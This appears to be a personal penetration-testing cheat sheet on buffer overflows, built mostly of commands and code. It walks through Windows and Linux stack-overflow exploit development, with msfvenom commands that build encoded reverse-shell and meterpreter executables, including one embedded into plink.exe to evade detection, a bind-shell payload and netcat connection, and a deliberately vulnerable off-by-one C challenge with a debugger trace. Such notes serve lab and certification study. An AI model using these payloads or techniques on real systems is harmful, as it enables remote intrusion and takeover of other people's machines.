Link to this headingBuffer Overflow

Link to this headingWindows Buffer Overflows

  1. Test for Controlling EIP
  • pattern_create.rb -l 2700
  • pattern_offset.rb -q 39694438
  1. Verify EIP location
  • buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
  1. Check for β€œBad Characters”
  • Add Bad characters and see if EIP is still controlled ie \x00 - \xFF

  1. Use Mona to determine a module that is unprotected

  2. Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP

  3. Use NASM to determine the HEX code for a JMP ESP instruction

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb JMP ESP 00000000 FFE4 jmp esp
  1. Run Mona in immunity log window to find (FFE4) XEF command
!mona find -s "\xff\xe4" -m slmfc.dll found at 0x5f4a358f - Flip around for little endian format buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
  1. MSFVenom to create payload

msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"

  1. Final Payload with NOP slide

buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

  1. Create a PE Reverse Shell
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -o shell\_reverse.exe
  1. Create a PE Reverse Shell and Encode 9 times with Shikata ga nai
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata\_ga\_nai -i 9 -o shell\_reverse\_msf\_encoded.exe
  1. Create a PE reverse shell and embed it into an existing executable
msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata\_ga\_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell\_reverse\_msf\_encoded\_embedded.exe
  1. Create a PE Reverse HTTPS shell
msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip LPORT=443 -f exe -o met\_https\_reverse.exe

Link to this headingLinux Buffer Overflows

  1. Run Evans Debugger against an app
    edb --run /usr/games/crossfire/bin/crossfire

  2. ESP register points toward the end of our CBuffer

add eax,12 jmp eax 83C00C add eax,byte +0xc FFE0 jmp eax
  1. Check for β€œBad Characters”
  • Add Bad characters and see if EIP is still controlled ie \x00 - \xFF
  1. Find JMP ESP address
    "\\x97\\x45\\x13\\x08" \# Found at Address 08134597

crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" + "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"

msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai

  1. Connect to the shell with netcat:
    nc -v $ip 4444

Link to this headingOne Byte Overflow

Vulnerable Code:

#include <stdio.h> #include <string.h> #include <stdlib.h> struct B2{ int (*ptr)(); char c[128]; }; struct B1{ char data[16]; struct B2 *myStruct; char data2[128]; }; void secret(){ printf("Game 0ver! You win :P\n"); } void function(){ printf("Everything is fine.\n"); } int main(int argc, char *argv[]){ printf("\033[1mWelcome to ROPLevel7 by @bellis1000!\nThis level involves exploiting an off-by-one vulnerability.\n\n\x1b[0m"); if (argc < 3){ printf("Usage: %s <data> <block_data>\n",argv[0]); exit(0); } struct B1 *s = malloc(256); s->myStruct = malloc(256); s->myStruct->ptr = function; strncpy(s->myStruct->c,argv[2],126); strncpy(s->data2,argv[2],126); // this is where the off-by-one bug occurs for (int i = 0; i <= 16; i++){ if (argv[1][i] != 0){ s->data[i] = argv[1][i]; }else{ break; } } // call function pointer s->myStruct->ptr(); return 0; }

Exploit Code:

gcc -fno-stack-protector -o roplevel7 roplevel7.c pwndbg> run AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB Starting program: /home/generalzero/Downloads/Exploit-Challenges-master/ROPLevel7/roplevel7 AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB pwndbg> Welcome to ROPLevel7 by @bellis1000! This level involves exploiting an off-by-one vulnerability. Breakpoint 1, 0x00005555555552cb in main () c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0000004242424242 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x41 RDX 0x4242424242 RDI 0x55555555973f β—‚β€” 0x42424242424242 /* 'BBBBBBB' */ RSI 0x7fffffffe170 β—‚β€” 0x4242424242424242 ('BBBBBBBB') R8 0x7 R9 0x7ffff7f8ba60 (main_arena+96) β€”β–Έ 0x5555555598c0 β—‚β€” 0x0 R10 0x18 R11 0x7ffff7f51d80 β—‚β€” 0xfff1c580fff1c570 R12 0x555555555080 (_start) β—‚β€” endbr64 R13 0x0 R14 0x0 R15 0x0 RBP 0x7fffffffdc60 β€”β–Έ 0x5555555552e0 (__libc_csu_init) β—‚β€” endbr64 *RSP 0x7fffffffdc38 β€”β–Έ 0x5555555552cd (main+302) β—‚β€” mov eax, 0 *RIP 0x4242424242 ─────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────────────── Invalid address 0x4242424242